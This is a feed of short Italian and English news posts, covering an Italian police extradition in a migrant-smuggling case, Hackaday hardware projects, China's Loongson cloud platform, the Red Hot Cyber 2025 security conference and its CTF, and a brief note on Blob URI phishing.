È stato estradato in Italia dall’Albania un egiziano arrestato nell’ambito dell’Operazione “El Rais”, condotta dalla Polizia di Stato di Siracusa e dal Servizio Centrale Operativo, coordinata dalla locale Direzione Distrettuale Antimafia (DDA). L’uomo è giunto a bordo di un volo partito da Tirana e atterrato nelle prime ore del pomeriggio presso l’Aeroporto di Fiumicino, scortato dagli agenti del Servizio per la Cooperazione Internazionale di Polizia e successivamente recluso presso la Casa Circondariale di Roma Rebibbia, a disposizione dell’Autorità Giudiziaria.
Si tratta di un ulteriore e significativo risultato ottenuto grazie alla sinergia e collaborazione tra le autorità italiane e quelle albanesi (Dipartimento Polizia Criminale – Forza Operazionale) con il contributo dell’Ufficio dell’Esperto per la Sicurezza operativo in Albania, che consentirà di processare in Italia uno dei componenti della complessa rete criminale dedita al traffico di migranti, operante tra l’Egitto, la Turchia e la Grecia.
L’attività, in particolare, rappresenta un seguito della vasta operazione (denominata “El Rais”) conclusa lo scorso 8 aprile, con l’esecuzione dell’ordinanza di custodia cautelare a carico di 15 egiziani ritenuti appartenenti ad uno dei più articolati e ben organizzati sodalizi dediti al traffico di migranti sulla Rotta del Mediterraneo Orientale, che si stima abbia favorito l’ingresso clandestino in Italia di almeno 3 mila persone, a partire dal 2021 a oggi, con introiti per l’organizzazione criminale di almeno 30 milioni di dollari.

L’indagine ha visto il coinvolgimento di diverse autorità e Forza di Polizia estere (albanesi, tedesche, turche e omanite), coordinate dal Servizio per la Cooperazione Internazionale di Polizia della Direzione Centrale della Polizia Criminale.
L'ordinanza era stata emessa dal Giudice per le Indagini Preliminari presso il Tribunale di Catania a seguito dell’imponente attività investigativa coordinata da questa Procura della Repubblica – Direzione Distrettuale Antimafia, condotta dal Servizio Centrale Operativo (SCO) e dalla Squadra Mobile di Siracusa in stretta sinergia con la Divisione Interpol del Servizio per la Cooperazione Internazionale di Polizia e l’Agenzia Europea EUROPOL nell’ambito dell’Operational Task Force (OTF) del “Mediterraneo orientale“.

Una operational task force di Europol è un gruppo di lavoro temporaneo e flessibile composto da esperti di polizia e investigatori provenienti da diversi paesi europei. Queste task force vengono create per affrontare specifiche minacce criminali transnazionali, come il traffico di droga, il terrorismo, il cybercrimine e altre forme di criminalità organizzata. Le principali caratteristiche di una operational task force di Europol sono:
Composizione flessibile: I membri provengono da diverse agenzie di contrasto al crimine dei paesi UE, a seconda delle esigenze dell'operazione. Obiettivi mirati: Sono create per indagare su specifici casi o fenomeni criminali di rilevanza internazionale. Coordinamento centralizzato: Vengono coordinate da Europol per massimizzare l'efficacia delle operazioni congiunte. Durata limitata: Hanno una durata limitata, attiva solo per il tempo necessario a raggiungere gli obiettivi dell'indagine.

#otf #Europol #serviziocentraleoperativo #sco #servizioperlacooperazioneinternazionaledipolizia #cooperazioneinternazionaledipolizia #direzionecentraledellapoliziacriminale #elrais #UfficiodellEspertoperlaSicurezza #trafficodiesseriumani

@Notizie dall'Italia e dal mondo



The ZX Spectrum Logic Analyzer


We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.

The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.

You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.

[Happy Little Diodes] is a big fan of the [Eldrgusman] design. What we would have given for a logic analyzer like this forty years ago.

youtube.com/embed/IHbIW8pi4Vo?…


hackaday.com/2025/05/12/the-zx…



Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche


Basta Intel, AMD, NVIDIA. ora tutto è realizzato in casa come la soluzione cloud di Inspur, uno dei principali fornitori di infrastrutture server in Cina. L’azienda cinese Loongson ha annunciato un traguardo importante: più di cento prodotti diversi ora funzionano con processori LoongArch.

Progettata per rafforzare l’indipendenza tecnologica del Paese, la piattaforma LoongArch incorpora i migliori sviluppi di MIPS e RISC-V. I microcircuiti creati utilizzando questa tecnologia vengono già integrati in apparecchiature industriali, personal computer e server. Sebbene siano ancora indietro rispetto ai modelli di punta x86 e Arm, stanno rapidamente recuperando terreno.

Lo scorso autunno, le autorità cinesi hanno invitato le aziende locali a scegliere microprocessori prodotti locali, dichiarando inaffidabili quelli esteri. L’elenco attuale dei chip testati non include prodotti AMD e Intel, ma sono comparse due opzioni di uno sviluppatore nazionale.

La paranoia digitale oggi è il nuovo buon senso.

Tuttavia, anche gli utenti più convinti dell’idea di sovranità tecnologica non acquisteranno dispositivi che non supportino il software necessario. Tenendo conto di ciò, l’azienda pubblica sistematicamente un catalogo dei programmi supportati, indicando sia le soluzioni già pronte sia quelle in fase di finalizzazione.

Il nuovo catalogo di aprile è stato integrato con un sistema cloud di Inspur. La versione precedente del documento faceva riferimento alla soluzione completa di Lenovo per i data center.

La reputazione di Inspur è confermata dalla sua collaborazione con i più grandi giganti tecnologici cinesi: Alibaba e Tencent. Dopo che gli Stati Uniti hanno aggiunto l’azienda alla Entity List delle sanzioni nel 2023, la sua capacità di collaborare con partner americani è stata seriamente limitata. Tuttavia, l’azienda serve con successo un’ampia base di clienti nazionali, offrendo sia hardware sia il suo sistema operativo proprietario InCloud OS per l’implementazione di servizi cloud.

L’integrazione di InCloud OS, basata sulle fondamenta di OpenStack, rafforza significativamente la posizione di LoongArch nel segmento dei sistemi ad alto carico. Di particolare interesse è il chip a 64 core recentemente presentato, che ha la capacità di installare due di questi chip in un unico sistema.

Nel mercato interno, l’ingegno tecnologico di Loongson si confronta con gli sviluppi di Alibaba e Huawei. Tuttavia, le loro soluzioni si basano sull’architettura Arm, che nelle attuali realtà geopolitiche potrebbe rivelarsi un punto debole.

Pechino sostiene attivamente i leader tecnologici nazionali sulla scena mondiale, sfruttando la situazione di stallo commerciale con Washington per rafforzare l’immagine di partner affidabile. Questo approccio potrebbe anche aiutare Loongson ad espandere la sua presenza internazionale.

L'articolo Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche proviene da il blog della sicurezza informatica.



RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag


Sabato 9 maggio, al Teatro Italia di Roma, si è chiusa la Red Hot Cyber Conference 2025, l’appuntamento annuale gratuito creato dalla community di RHC dedicato alla sicurezza informatica, alle tecnologie digitali emergenti, ma soprattutto ai giovani, sempre più numerosi ed appassionati ad ogni edizione e alla consapevolezza del rischio.

Massimiliano Brolli, il founder di Red Hot Cyber, ha dedicato moltissimo impegno nella creazione di questo evento e della community, per promuovere una visione etica in un mondo digitale.

Come cita il manifesto di RHC, “dalle ceneri del cyberpunk e dei vecchi gruppi hacker del passato che non si sono mai rassegnati a combattere per un mondo digitalmente più onesto e giusto, questo movimento di frontiera, vuole essere una voce fuori dal coro nel costruire dal basso un cambiamento, cercando di promuovere la cultura dell’hacking interdisciplinare, permettendo così all’Italia di incubare nuovi talenti che in futuro potranno renderci nuovamente protagonisti nella scena internazionale.

I protagonisti del panel: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri e Giuseppe Corasaniti


Protagonisti del panel sono state importanti figure istituzionali, tra cui il prezioso intervento di Ivano Gabrielli, Direttore della Polizia Postale, che ha portato il suo contributo in qualità di massimo responsabile del Servizio Polizia Postale e delle Comunicazioni, con una lunga esperienza nel contrasto al cybercrime e nella protezione delle infrastrutture critiche, Luigi Montuori, Direttore Dipartimento sanità e ricerca presso il Garante per la protezione dei dati personali, l’immancabile Paolo Galdieri, avvocato penalista, Cassazionista e docente universitario di Diritto penale dell’informatica e Giuseppe Corasaniti, ex magistrato e oggi Professore di infromatica guridica ed etica digitale all’Università Mercatorum, le cui interviste esclusive, insieme a quella di Luca Piccinelli, CISO Huawei Italia, Gabriele Faggioli di Clusit e Flavia Rizza sul cyberbullismo, saranno presto disponibili sul canale YouTube di Red Hot Cyber.

Verrà anche pubblicato un video al giorno dell’evento, seguendo il programma della conferenza, insieme alla galleria fotografica di una conferenza che si conferma punto di riferimento della cybersecurity italiana e catalizzatore per le nuove generazioni.

Abbiamo infatti approfondito, con loro temi come la situazione dell’Italia in questo momento storico, del lato oscuro dell’IA, di cyber resilienza e cyber deterrenza, di transizione al Cloud, delle nuove figure emergenti con grandi capacità tecniche nelle indagini informatiche, di software spia, di attacchi APT alle telecomunicazioni ma anche di reti 5g, di Nis2, del confine invisbile tra crimine informatico e cyber terrorismo visto da un ex magistrato e molto altro ancora!

Red Hot Cyber 2025: gli interventi e i workshop


Ma sul palco del Teatro Italia, non sono mancate altre figure di spicco nel panorama della sicurezza informatica, come Aldo Di Mattia, Direttore SSE and Cybersecurity Advisor Italy & Malta che ha parlato della sfida impari tra Infrastrutture critiche e cybercriminali, Sunil Venazini, Principle Sales Engineer, che ha mostrato strategie e strumenti nell’era dell’IA tra attaccanti e difensori, il mitico Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, che ha portato sul palco “La scomoda eredità della filosofia Hippie”. Ma non solo, Donato Onofri, Senior Red Team Engineer Crowdstrike ha parlato al pubblico di “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”, Michele Mezza, giornalista e docente della Federico II di Napoli, autore di Net War, che con il suo intervento ci ha parlato di “informazione come linguaggio della guerra ibrida”, seguiti dai ‘nostri’ Stefano Gazzella, giornalista e Data Protection Officer, con “Cani da Guardia 4.0,Informazione e Divulgazione Cyber” e Pietro Melillo, CISO di Wuerth Italia, con “Un anno di DarkLab tra Intelligence a Threat Actors e non ultimi Agostino Pellegrino, Cyber Security Expert. che con il suo speech “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” ci ha illustrato come una Wi-Fi può venire hackerata, Roberto Camerinesi, ethical hacker e CTO di Cyber Evolution, che ha portato tra il pubblico le nuove frontiere dell’hacking satellitare con “Houston, abbiamo un problema”, ed infine il geniale e divertente Antonio Montillo, ethical hacker e ricercatore di sicurezza, con il suo immancabile cappello da “Malware Chef” che ha condiviso una delle sue migliori ricette: “Come Cucinare Una LLM Backdoor”.

Nella lunga lista poi non si possono dimenticare gli interventi di Luca Almici, CEO di Enterprise con “Log Management e Sicurezza”, Luigi Martire, Cyber Threat Intelligence Analyst di Tinexta con “Threat intelligence e attribution: aaccia agli APT”, Selene Giupponi, Manager Director Europe Resecurity, con “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Questa lunga lista non sarebbe completa senza Nicola Dalla Vecchia, Senior Solutions Engineer, con “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”, Irene Sorani, esperta di sicurezza informatica con “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”, Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, con “Cyber Risk: quanto pensi di conoscerlo?” Giuliano Rulli, COO Oplium Italia con Il lato oscuro del Cloud: i dati sono al sicuro?”, Diego Fasano, CEO di Ermetix con “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati” Dario Pasquini, Andrea Paita, Cybersecurity Services Manager con Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”, Andrea Acito, Manging Director di Digimat con l’attualismo “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva” e Dario Pasquini, Principal Researcher at RSAC, con “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”

L’inaugurazione dell’8 maggio ha coinvolto gli ospiti con i tradizionali workshop ‘hands-n’ realizzati in collaborazione con Accenture Italia, nei quali i partecipanti hanno potuto sperimentare direttamente le tecnologie con esercizi ad hoc mirati a perfezionare le competenze apprese come la creazione di un sistema IA di Visual Object Tracking, come hackerare un sito wordpress oppure entrare nel Dark Web in sicurezza. Si è dato anche spazio anche ad argomenti come il cyberbullismo con Flavia Rizza o la social engineering con la scoperta dei deepfake emergenti.

Red Hot Cyber Conference: la Capture The Flag


Lo stesso giorno è stata inaugurata la terza Capture The Flag (CTF) di Red Hot Cyber, realizzata in collaborazione con CyberSecurityUp di Fata Informatica, Hackmageddon World e la Fondazione Bruno Kessler (FBK), con le challenge relative all’ingegneria sociale. La sfida, che è stata coordinata dagli ethical hacker Antonio Montillo, Vincenzo Alonge, Andrea Tassotti, Thomas Kirschner, il collettivo hacker Hackerwood e il ricercatore di sicurezza Daniele Santoro, ha messo alla dura prova molti partecipanti.

L’obiettivo dei 111 hacker distribuiti in 32 team è stato quello di colpire le infrastrutture critiche di uno stato oltre alla presenza di una bomba da dissinescare.

I vincitori dell’edizione RHC 2025, premiati la sera del 9 maggio, dopo due giorni di straordinario impegno, sono stati gli imbattibili PizzaFeijoda, seguiti dagli emergenti Winnerz e i veterani CarbonHackers.

Ancora una volta la Capture The Flag tra sfide di social engineering, analisi e crittografia, exploit di vulnerabilità, web hacking e altro ancora si è dimostrata un modo per sviluppare le capacità di problem solving, di improvvisazione e creatività, di pensiero critico, spirito di squadra e di strategia difensiva e offensiva, ma soprattutto ad essere stata premiata sono state la tenacia e la perseveranza, doti fondamentale per un hacker, così come per chiunque lavori nel campo della cybersecurity o dell’informatica in generale, perché senza anche il talento più brillante rischierebbe di non arrivare lontano.

Un appuntamento consolidato, giunto alla sua quarta edizione


Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!

L'articolo RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag proviene da il blog della sicurezza informatica.



Semiconductor Simulator Lets You Play IC Designer


For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.

This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.

It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.

Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.

Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.


hackaday.com/2025/05/12/semico…



Blob URI: la nuova frontiera del phishing per aggirare i controlli di sicurezza


@Informatica (Italy e non Italy 😁)
È stata identificata una nuova tecnica di phishing che usa i Blob URI, ossia URL per il browser validi solo all’interno della sessione dell’utente. Trattandosi di contenuti locali, tali link non possono essere analizzati dai tradizionali



Once you're matured you will realize that silence is more powerful than proving a point.


A Single-Pixel Camera Without Moving Parts Using Compressed Sensing



One of the reconstructed images, using all 4,096 matrix patterns as input, next to the original object. (Credit: okooptics, Jon Bumstead)One of the reconstructed images, using all 4,096 matrix patterns as input, next to the original object. (Credit: okooptics, Jon Bumstead)
There’s a strange allure to single-pixel cameras due to the simultaneous simplicity and yet fascinating features that they can offer, such as no set resolution limit. That said, the typical implementations that use some kind of scanning (MEMS) mirror or similar approach suffer from various issues even when you’re photographing a perfectly stationary and static scene due to their complex mechanical nature. Yet there’s a way around this, involving a LED matrix and a single photoresistor, as covered by [Jon Bumstead] in an article with accompanying video.

As he points out, this isn’t a new concept, with research papers cited that go back many years. At the core lies the signal processing technique called compressed sensing, which is incidentally also used with computed tomography (CT) and magnetic resonance imaging (MRI) scanners. Compressed sensing enables the reconstruction of a signal from a series of samples, by using existing knowledge of the signal.

In the case of this single-pixel camera, the known information is the illumination, which is a Hadamard matrix pattern displayed on the 64 x 64 pixel LED matrix, ergo 4,096 possible patterns. A total of 4,096 samples are thus recorded, which are subsequently processed with a Matlab script. As pointed out, even 50% of the maximum possible matrices can suffice here, with appropriately chosen patterns.

While not an incredibly fast method, it is fully solid-state, can be adapted to use other wavelengths, and with some tweaking of the used components probably could cut down the sampling time required.

youtube.com/embed/EE9AETSoPHw?…


hackaday.com/2025/05/12/a-sing…



Work, Eat, Sleep, Repeat: Become a Human Tamagotchi


When [Terence Grover] set out to build a Tamagotchi-inspired simulator, he didn’t just add a few modern tweaks. He ditched the entire concept and rebuilt it from the ground up. Forget cute wide-eyed blobby animals and pixel-poop. This Raspberry Pi-powered project ditches nostalgia in favour of brutal realism: inflation, burnout, capitalism, and the occasional existential crisis. Think Sims meets cyberpunk, rendered charmingly in Python on a low-res RGB LED matrix.

Instead of hunger and poop meters, this dystopian pet juggles Maslow’s hierarchy: hunger, rest, safety, social life, esteem, and money. Players make real-life-inspired decisions like working, socialising, and going into education – each affecting the stats in logical (and often unfair) ways. No free lunch here: food requires money, money requires mind-numbing labour, and labour tanks your rest. You can even die of overwork à la Amazon warehouse. The UI and animation logic are all hand-coded, and there’s a working buzzer, pixel-perfect sprite movement, and even mini-games to simulate job repetition.

It’s equal parts social commentary and pixel art fever dream. While we have covered Tamagotchi recreations some time ago, this one makes you the needy survivor. Want your own dystopia in 64×32? Head over to [Terence Grover]’s Github and fork the full open source code. We’ll be watching. The Tamagotchi certainly is.

youtube.com/embed/edaDDDNEmvw?…


hackaday.com/2025/05/12/work-e…



L'interesse per l'AI ha media nulla.


Ovvero... da una parte c'è il gruppo di chi è certo sarà il futuro dell'umanità e che grazie a lei supereremo in un attimo tutti i problemi con cui la nostra specie si è dovuta confrontare negli ultimi 10.000 anni e dall'altra il gruppo di quelli che la considerano il Maligno in formato binario.

Tra i due, il (quasi) nulla.

Ora... calcolate la media e ditemi se mi sono sbagliato.



Unwinding an Unusual Slide Rule


If the Otis King slide rule in [Chris Staecker’s] latest video looks a bit familiar, you might be getting up there in age, or you might remember seeing us talk about one in our collection. Actually, we have two floating around one of the Hackaday bunkers, and they are quite the conversation piece. You can watch the video below.

The device is often mistaken for a spyglass, but it is really a huge slide rule with the scale wrapped around in a rod-shaped form factor. The video says the scale is the same as a 30-inch scale, but we think it is closer to 66 inches.

Slide rules work using the idea that adding up logarithms is the same as multiplying. For example, for a base 10 logarithm, log(10)=1, log(100)=2, and log(1000)=3. So you can see that 1+2=3. If the scales are printed so that you can easily add and then look up the antilog, you can easily figure out that 10×100=1000.

The black center part acts like a cursor on a conventional slide rule. How does it work? Watch [Chris’] video and you’ll see. We know from experience that one of these in good shape isn’t cheap. Lucky that [Chris] gives us a 3D printed version so you can make your own.

Another way to reduce the scale is to go circular, and you can make one of those, too.

youtube.com/embed/h1p4OwDb0Hw?…


hackaday.com/2025/05/12/unwind…